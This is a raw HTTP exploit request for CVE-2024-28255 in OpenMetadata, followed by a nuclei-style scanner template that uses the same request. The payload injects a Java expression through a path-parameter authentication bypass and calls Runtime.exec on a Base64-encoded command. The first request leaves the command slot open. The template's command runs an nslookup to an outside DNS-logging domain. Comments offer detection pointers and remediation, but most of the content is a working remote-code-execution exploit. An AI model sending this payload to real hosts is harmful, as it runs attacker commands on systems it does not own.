GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22Base64编码命令%22))) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Connection: close
Accept-Encoding: gzip
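# Scanner template (nuclei-style layout) that checks an OpenMetadata instance
# for CVE-2024-28255. The nesting below is restored from a listing whose
# indentation had been flattened, which left `info`, `http` and `matchers`
# without their child keys.
#
# Scope note: this is an active check, not a passive fingerprint. The request
# makes a vulnerable target evaluate an expression that starts a process, so
# every host that matches has also run the embedded command.
#
# Remediation for a positive result: upgrade OpenMetadata to a release that
# contains the vendor fix for this CVE (the fixed version is not stated on
# this page) and review the host for prior use of the same request pattern.
id: CVE-2024-28255

info:
  name: CVE-2024-28255
  author: xiaoming
  severity: high
  description: OpenMetadata Command Execution
  metadata:
    max-request: 1
    # Left empty by the author; no discovery query is supplied.
    shodan-query: ""
    verified: true

http:
  - raw:
      # Detection pointers for defenders, all visible in the request line:
      #   * a `;` path parameter carrying URL-encoded slashes (`%2f`) right
      #     after `/api/v1`,
      #   * the `/events/subscriptions/validation/condition/` endpoint,
      #   * an expression starting with `T(java.lang.` inside the URL path.
      # The Base64 argument decodes to a DNS lookup of a third-party logging
      # domain, so a scan also produces outbound DNS from the target. The
      # matcher below does not use that callback.
      # `|+` keeps trailing newlines; nothing may be inserted between the last
      # header and the next key without changing the request body.
      - |+
        GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgdGVzdC5kbnNsb2cuY24=%22))) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
        Connection: close
        Accept-Encoding: gzip
    redirects: true
    matchers-condition: and
    matchers:
      # NOTE(review): `id` is kept as on the page; matchers are normally
      # labelled with `name` - confirm the template passes validation.
      - id: 1
        type: word
        part: body
        words:
          # Matches the literal text 400 in the response body, not the HTTP
          # status line - presumably the error code echoed in the body; a
          # status matcher would be stricter. TODO confirm.
          - "400"
          # Class name of the started process appearing in the error text is
          # the evidence that the expression was evaluated.
          - java.lang.ProcessImpl
        # Both words must be present for a match.
        condition: and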